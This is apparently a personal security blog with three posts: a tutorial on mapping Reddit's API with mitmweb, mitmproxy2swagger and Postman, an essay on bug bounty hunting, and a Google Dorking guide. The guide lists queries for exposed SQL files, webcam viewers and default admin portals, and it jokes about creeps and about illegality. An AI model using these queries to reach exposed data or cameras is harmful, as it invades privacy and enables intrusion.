    The first thing I like to do whenever I approach an application is having a good old-fashioned click-around.

    I click on links and buttons, fill out forms, make a user account, login—everything that a normal user is expected to do. All the while, I pay attention to what the overall functionality of the app is. I it a note taking app? A job board? An online store? etc…

    While doing this, I keep my browser’s dev-tools open to see how the application is handling what I’m doing. The app can have a specific route for handling API requests, like /api/v2/, /user-api/, /content-manager/…you get the idea. It can even have separate domains for handling function calls, like api.example.com, example-api.com, the list goes on…

    Knowing where requests are being made to is crucial in the next steps. We only want to target specific API’s, so we need to know how to filter the traffic we gather later on.

    The point of all this is not to get to hacking the app. I actually do the opposite here by using it as intended. Knowing what the application normally does will help me to understand how I can exploit it into doing abnormal things later. Knowledge is power.

    Of course, you can go as deep or as shallow into the application as you want. It depends on your workflow. But, don’t sleep on this step! It might save you tons of time backtracking in the future.

    Click-around v2

    This second click-around is where all the magic happens. Now, we’re going to proxy all of our traffic using mitmweb which is a part of the mitmproxy suite of tools. If you don’t have mitmproxy, I highly suggest installing it.

    mitmweb --listen-host 192.168.186.93 --web-host 192.168.186.93
    [13:51:03.580] HTTP(S) proxy listening at 192.168.186.93:8080.
    [13:51:03.582] Web server listening at http://192.168.186.93:8081/
    [13:51:03.851] No web browser found. Please open a browser and point it to http://192.168.186.93:8081/

    I have mitmweb running on my Kali Linux virtual machine in VMware. By default, mitmweb will run the proxy and web interface on localhost. I like to set my host to the address of my virtual machine (192.168.186.93) so I can access it on my host machine. This is because I like to do everything that needs graphics on my host machine and just run Kali without a desktop so it is as low-impact on my laptop as possible. I find this makes my experience a bit smoother on my laptop.

    Anyways…Now, that we got the proxy up and running in Kali, I pip open a web browser and proxy the traffic through it. I’m going to target Reddit. From my earlier click around, I know that their API handling login is routed under www.reddit.com/api, while actions such as upvotes seems to be handled by oauth.reddit.com/api Knowing that, I’m going to focus on the second route and click-around!

    After some light clicking around, a ton of requests can be seen from the webui, which runs on port 8081 by default.

    For my browser of choice: Firefox. I choose to use Firefox because I like it’s dev-tools and the FoxyProxy browser extension conveniently allows me to switch between proxies.

    Let’s download the requests we want to examine in a flow file so I can examine them.

    I like to use the highlight bar (the input under the search bar) to highlight only the routes I need. Then I click File and finally, Save filtered to grab only the relevant requests.

    I find that saving only the necessary routes dramatically reduces the size of flow file. Without doing this, mitmproxy2swagger (the tool we’re going to use to process the flow file) might hang if the file is too big.

    Converting the flow file

    The next step is to convert this flow file into a YAML file that other tools can read. To do this, I’m using a tool called mitmproxy2swagger.

    After copying the flow file over to my Kali machine, I run mitmproxy2swagger like so:

    ┌──(walter㉿kali)-[/tmp]
    └─$ mitmproxy2swagger -i flows -o spec.yml -p "https://oauth.reddit.com" -f flow
    No existing swagger file found. Creating new one.
    [▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌] 100.0%[warn] flow without response: http://192.168.186.93:8081/flows/dump?filter=oauth.reddit.com/api
    Done!

    Let’s break this down:

    • -i specifies the input file (in this case our flows file)
    • -o is the output file. We want to name it spec.yml so that mitmproxy2swagger recognizes it on pass 2 (notice it said it didn’t find a swagger file)
    • -p is the URL we want to parse
    • -f is the format. In this case, it’s the flow format but HAR files are also accepted

    We’re not done with mitmproxy2swagger just yet. First we need to edit our spec.yml file to tell it which routes to process. My spec.yml file looks like this:

    openapi: 3.0.0
    info:
      title: flows Mitmproxy2Swagger
      version: 1.0.0
    servers:
    - url: https://oauth.reddit.com
      description: The default server
    paths: {}
    x-path-templates:
    # Remove the ignore: prefix to generate an endpoint with its URL
    # Lines that are closer to the top take precedence, the matching is greedy
    - ignore:/api/jail/asknicely
    - ignore:/api/multi/user/CommunityAdoptionBot/m/adoption_week/
    - ignore:/api/send_verification_email
    - ignore:/api/submit
    - ignore:/api/trending_searches_v1.json
    - ignore:/api/v1/draft
    - ignore:/api/v1/external_account/user/SpareBobcat1406.json
    - ignore:/api/vote

    Notice the comment that tells us to remove ignore tags before the route. All of those routes look interesting to me so I’ll go ahead and remove all of them:

    openapi: 3.0.0
    info:
      title: flows Mitmproxy2Swagger
      version: 1.0.0
    servers:
    - url: https://oauth.reddit.com
      description: The default server
    paths: {}
    x-path-templates:
    # Remove the  prefix to generate an endpoint with its URL
    # Lines that are closer to the top take precedence, the matching is greedy
    - /api/jail/asknicely
    - /api/multi/user/CommunityAdoptionBot/m/adoption_week/
    - /api/send_verification_email
    - /api/submit
    - /api/trending_searches_v1.json
    - /api/v1/draft
    - /api/v1/external_account/user/SpareBobcat1406.json
    - /api/vote

    I edited the file in vim and used the command :%s/:ignore//g to quickly replace all instances of ignore: with an empty string. If that doesn’t make sense to you, maybe I’ll have to make a vim tutorial in the future…

    With the ignores removed in the right places, I’ll run mitmproxy2swagger once more:

    ┌──(walter㉿kali)-[/tmp]
    └─$ mitmproxy2swagger -i flows -o spec.yml -p "https://oauth.reddit.com" -f flow --examples
    [▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌▌] 100.0%[warn] flow without response: http://192.168.186.93:8081/flows/dump?filter=oauth.reddit.com/api
    Done!

    You’ll notice I added the --examples flag at the end. That tells mitmproxy2swagger to add any data from the flow file (like the body of a post request) so I can get an idea of how to re-make the request in the future.

    The last step is to convert this spec.yml file into a yaml file. So, head on over to https://editor.swagger.io/ so we can upload our spec.yml file. Select File > Import file to upload your spec.yml. Mine looked like this:

    Now click File again and then Save as YAML to export it to yaml.

    We did it! The grunt work is over. We can now begin testing our API using other tools.

    Enter Postman!

    Pun intended…Postman is my favorite tool for the job when testing an API for several reasons. Lets go through part of my initial workflow so you can see why.

    First, I open up a fresh workspace. I usually create a separate workspace for each of my bug bounty targets to keep everything organized. Then, it’s as easy as clicking the import button in the top left and importing your YAML file from earlier. Here’s what mine looked like after I imported it:

    And Postman auto-magically organizes everything in nested folders for me!

    One of the first things I do when testing API’s is see how routes respond without any authentication. The collection runner makes this all a snap! Click on the collection (top most folder), go to the Tests Tab, then select one of the test snippets to get started fast. Then click run!

    I like to use the status code 200 to weed out routes that don’t require any authentication, but you can edit the code and customize the cases. Then, it’s time to run the collection by clicking the Run button in the upper right..

    This takes you to a new window where you can deselect uninteresting routes. I like to deselect all of the OPT routes so I can focus on the ones that matter.

    Then hit run and Postman will automatically run every request.

    As you can see, all of the 9 routes I collected failed with 403 errors, which was expected since I was authenticated as a user when I proxied this. But, this is a good first step to take when testing an API and Postman makes it so easy!

    And there’s so much more it can do! You can create variables, import/export curl commands, write scripts that run before each request, save your Workspace to the cloud to access it from anywhere, proxy requests to other tools (like Burpsuite)…all FOR FREE!

    So, I highly encourage you to add this tool to your pentesting toolkit!

    Conclusion

    Having a click-around, using mitmweb to proxy requests, feeding the results to mitmproxy2swagger and editor.swagger.io, and finally importing the resulting YAML file to Postman is a great way to map API’s.

    API’s can be daunting with there complexity. This approach will help you organize the functionality of a web application a lot better.

    It’s also worth noting that if API Documentation exists, you should read it to supplement your findings. It’ll be boring but worth it in the end. Good bug hunters are smart bug hunters.

    You can also checkout the documentation on the Wayback Machine to see if any old routes are still supported.

    Thanks for reading and I hope this makes you a better hacker!

  • My Bug Bounty Experience

    My Bug Bounty Experience

    Lately, I’ve been spending quite a bit of time learning web hacking and practicing what I’ve learned on bug bounty programs. For those of you unfamiliar with bug bounty programs, they are programs hosted by companies that provide payouts for vulnerabilities found on their platforms. Payouts vary depending on the criticality of the vulnerability and some companies may not even host programs that offer no rewards. Essentially, when you’re a bug bounty hunter, you’re a penetration tester that’s working for free until you submit a security flaw.

    The main reason I decided to try my hand at bug bounty hunting is because I wanted to gain experience hacking to prepare me for a career in penetration testing. I also love learning techniques and picking apart web applications. However finding vulnerabilities was not as easy as I thought it would be. So, in the post I’m going to share some things I picked up while bug bounty hunting.

    It’s tough…

    Bug bounty hunting is hard. Sure, it’s fun to be able to dig through a web application and see things that you normally wouldn’t see when using a web page as intended. I had loads of fun finding developer log in pages and finding weird API routes. Finding bugs that were actually exploitable was another story.

    You have to compete

    When you join a public bug bounty program, you’re competing with hundreds or even thousands of other hackers who may be way more experienced than you. That means that the application is most likely to be picked clean of easier bugs that automated scanners can detect. I ran into my fair share of duplicates when I first started out which was definitely a disappointment. It’s not nice when you take the time documenting your submission only for it to be shut down by Hackerone because some other hacker beat you to it.

    The competition factor definitely makes the experience more difficult. However, there are some ways to help limit the competitive aspect.

    1. Choose a good target

    Choosing a target really depends on you.  Your preferences, what your strengths, are and what you are interested in can all be factors in deciding what target you should spend time on. But when you are just starting out there are some things that can help point you in the right direction. For example, choosing a target that has a small or no payout will make it less likely that tons of money hungry hackers aren’t going after it.

    I would also recommend going after a target that has a medium scope. When you’re first starting out, something with a couple to a few wild-card domains is great. That leaves plenty of opportunity for you to find tons of sub domains and interesting corners of the application. Don’t go too big though. You can get quickly overwhelmed with the amount of information automated scanners pull up on the target. It also might take a long time for the scanners to process all of the subdomains it can find.

    I experienced a similar situation when doing recon on ABB. They had 7 assets in scope (all wild card domains), which seemed like a small number at the time but I was quickly overwhelmed with the amount of subdomains and URLs returned to me. I also spent a lot of time waiting on scan results, which wasn’t exactly fun.

    Most importantly, you should choose a target that interests you. Most likely, you’re going to have to spend a lot of time digging through an application to find any vulnerabilities. If you choose an application you’re not interested in, you might get bored before you do any deep digging that could lead to serious bugs.

    2. Find programs with private invites

    Programs like Hackerone, Intigriti, and Bugcrowd are fantastic because you have the option to join bug bounty programs that aren’t listed publicly. The way this is done for each program varies. In Hackerone’s case, all you have to do is a few CTF challenges and sign up for MFA and you get your first one. To get more, though, you have to submit your first valid bug.

    I was able to get my first invite with Hackerone but quickly got bored of the small scope of the target I was invited to look for bugs. So, I’ve dedicated most of my time to finding bugs to get more interesting invites. At the time of this writing, my first submission is under the review of the company, so hopefully I get more invites soon!

    3. Find login pages

    Whenever I do my recon, I intentionally seek out login pages. If the company has a large scope, I look for login pages that differ from the overall application and use older technology. Then, I create an account and check out the application from there.

    This gives me several advantages. For one, this web application is hidden from all the skids that solely rely on automated scanning to throw shit at the wall and see what sticks.

    Number two, applications that require user accounts typically have more functionality than the front-facing application. You can do all sorts of fun things with user accounts like creating two and seeing if you can access anything from the other account (IDOR). It’s also more likely there’s more opportunities for user input and API routes that are worth digging into.

    Don’t Give Up

    Bug bounty hunting is going to be discouraging at times. You might go weeks or even months without being able to find anything. However, even if you spend time digging through a site, you’ll still learn and grow in the process. This is what I kept telling myself and is what kept me motivated to keep going.

    Bug bounty hunting taught me several things that CTFs could never do, including how to do effective reconnaissance and what to look for when examining a web application. CTFs always have one (sometimes obvious) path to a flag. With bug bounty hunting you develop creativity and an intuition that is invaluable in the world of pentesting.

    If your main goal for bug bounty hunting is to get some experience and learn, you’ll never be disappointed. On the other hand, if you’re just doing this for the money, you’re in for a quick burnout.

    These are just a few things I picked up on digging through various applications. What works for me might not work for you. The only way you can find what works for you is by participating in programs, which leads me into my next piece of advice.

    Just do them

    I know this is the cliche Nike slogan part of every self-help guru’s utility belt but it rings true in this case. Bug bounty hunting is intimidating. It’s hard to know if you have enough knowledge to start diving into real-world applications. The hard truth of the matter is, you never will. Technology is constantly changing. Therefore, so is hacking. So, if you have the mindset that you need to learn a certain amount of topics before you dive into bug bounty hunting, you will forever be trapped in this way of thinking.

    Before I started, I had it in my head that I needed to do all of Portswigger’s Web Academy’s courses, all of Hacker101’s CTF’s, vulnerable VM’s like OWASP’s Juiceshop…you get the idea. If I wasn’t able to do all of these CTF’s and labs with ease, how was I supposed to expect myself to find real-world bugs?

    Then there was the YouTube spiral. I found all of these amazing hackers online like Nahamsec, Tomnomnom, and Jhaddix. They had some incredible methodologies that I wanted to adopt. I wanted to be just as good as them before even starting. Then, I’d find tons of bugs just like them! I cringed writing that… These guys are great because they have been doing it for years. You can’t start hunting for bugs and expect you’re going to be as good as the greats.

    What also helped me dive into it was treating it as a learning experience. You learn as you hunt for bugs. So, I added bug hunting to my regimen of tutorials and CTFs and before I knew it, I was hooked! And I learned a ton! I learned how to do effective recon, how to reverse engineer API’s, practical fuzzing, and the list will only grow the more I learn.

    It’s also worth reminding yourself that if you find yourself struggling hard, take that as a win. That’s when quality learning occurs.

    Bugs are out there

    It’s easy to doubt yourself when bug hunting. I mean the odds are pretty low you’ll find a bug. Most people have already found the easy bugs with automated scanners. All that’s left is the difficult bugs that are going to be nearly impossible to find because the application has already been tested thoroughly by the company’s team of engineers and security researchers. So, it’s pretty much pointless to even attempt looking for bugs.

    This thinking is flawed and is known as a scarcity mindset. If you’ve ever worked in a software development environment, you would know that rolling out features and testing them never goes smoothly. Developers are constantly swamped with work and under pressure to meet strict deadlines. The same is true for testers.

    I’ve worked as a Quality Engineer and have experienced cases where quick fixes are unavoidable. It surprised me how often people are willing to scrap something together just to meet a deadline.

    At the end of the day, we’re only human. People are going to make mistakes and overlook obvious flaws. Bugs are actually plentiful. Don’t believe me? Just take a look at the stream of “Hactivity” on Hackerone’s site or any other bug bounty program for that matter. Even the big fortune 500 companies like Uber and Tesla repeatedly have flaws. Moreover, companies are rolling out brand new features every day, so the attack surface is constantly growing. That’s why a lot of bug bounty experts will familiarize and stick with a few companies when doing research.

    Conclusion

    If you’re reading this and are thinking about doing bug bounty programs, I highly encourage you to do so. It’s one of the best ways to get real-world experience without having to get a job. I’ve learned so much and have had so much fun in the process. That being said, my experience is my own. You may have a completely different experience than me, so the only way to know gauge whether or not bug bounty hunting is for you is to get out there and do it!

     

     

  • Google Dorking

    Hello again! In this post, I’m going to go over an extremely
    useful technique security experts often use to gather
    information and uncover unintentionally exposed resources
    by leveraging the power of Google.

    This technique is known as Google Dorking. A Google Dork is
    a search query that uses Google’s advanced query syntax to
    boost the effectiveness of a normal search.

    Even if you’re not security-oriented, these techniques can be
    extremely useful in your daily Googling life. So, let’s get
    into it!

    Introducing…Dork Parameters

    Before we get into some juicy examples, let’s make sense
    of some of the most useful query strings. I’m only going
    to go over some common ones, but you can take a look
    at this article
    for information on all 42 of them.

    Basic syntax

    The basic syntax of an advanced Google query is as follows:

    search term [query-parameter]:[value]

    You can chain as many query parameters as you want together
    to make for some complex search results.

    In addition to this, Google allows you to chain search results by the
    conditional statements AND and OR.

    For example, if I wanted to look up the results of pages that included
    information about both dogs and cats I could search for:

    dogs AND cats

    And these queries can be chained together and mixed intermittently
    offering flexibility and power.

    If you want to limit your searches to exact matches, you can optionally
    add double quotes to your query.

    For example, If I wanted to pull pages that contained the phrase, Squirtle is cool exactly, I could search:

    "Squirtle is cool"

    It is also important to remember that query parameters are delimited by
    spaces. So, if you wanted to search for pages titled “Index of,” you would
    have to search

    intitle:"Index of"

    rather than

    intitle:Index of

    The former would search for pages that had “Index” in their title
    and matches for “of.”

    Useful Parameters

    Now, let’s get into some important parameters that could make for some
    pretty powerful search results.

    1. site:[value]

    The site parameter limits results to a specific domain. So,
    if I wanted to limit my searches to facebook.com, I would type:

    site:facebook.com

    This can be used to find possible vulnerabilities in a specific company,
    or limit results about a target to social media sites.

    2. inurl:[value]

    The inurl is pretty self-explanatory: it pulls matches based on
    what is in the url of the result. If I wanted to pull up admin
    pages that might be publicly available, I could search:

    inurl:admin

    This is useful for providing URL matches rather than matches in the
    page itself.

    3. filetype:[value]

    This parameter is used to restrict results based on filetype. For
    example, if I wanted to search for pdf files, I could search:

    filetype:pdf

    This is an especially powerful parameter as log files as well as
    configuration files can be scraped using this parameter.

    4. intext:[value]

    Using intext allows you to specify matches in the body of a page.
    The body of the page is anything rendered between HTML tags. For
    example, if I wanted to search for blog articles that were about
    pokemon, I could search:

    inurl:blog intext:pokemon

    These are only some of the key query parameters allowed by Google, but
    as you could imagine, they could be combined in clever ways that can
    yield powerful results.

    Exploitation Examples

    Now it’s time for some juicy examples! There are tons of common Google Dorks
    out there that expose common info and of course, you can combine them with
    your own custom Dork to find some interesting things. You’d be surprised by
    what people can leave exposed to the internet. So, let’s get to the examples!

    intext:"index of" ".sql"

    This Dork string can be used to find SQL database files in directories
    that are traversable. This can potentially expose a number of database
    files that you can download and look through on your own machine.

    No bueno for people that have this exposed as it can contain user information
    or other private information.

    inurl:viewer/live/index.html

    This Dork can be used to connect to online devices, such as live-streaming webcams. Many webcams are intentionally made to be public, but some might not be.
    If you’re a creep, this can be perfect for you!

    inurl:"admin/default.aspx"

    Using this Dork, you can find default login portals. Oftentimes, login portals
    that are unintentionally exposed will be using default credentials. So, this Dork
    can be used to find potentially vulnerable sites. Use at your own discretion!

    These are only a few of the many powerful Dorks out there. Exploit DB’s
    Google Hacking Database
    has loads of other examples, so I encourage you to experiment with these and
    combine them with your own Dorks.

    Obviously, it goes without saying that you can stumble upon private information
    and vulnerabilities. So, look don’t touch! It’s best to contact site owners
    to make them aware of this information. But DO NOT do anything illegal
    (it’s only illegal if you get caught *wink-wink*).

    Anyways, that’s it for this security tutorial. More coming soon!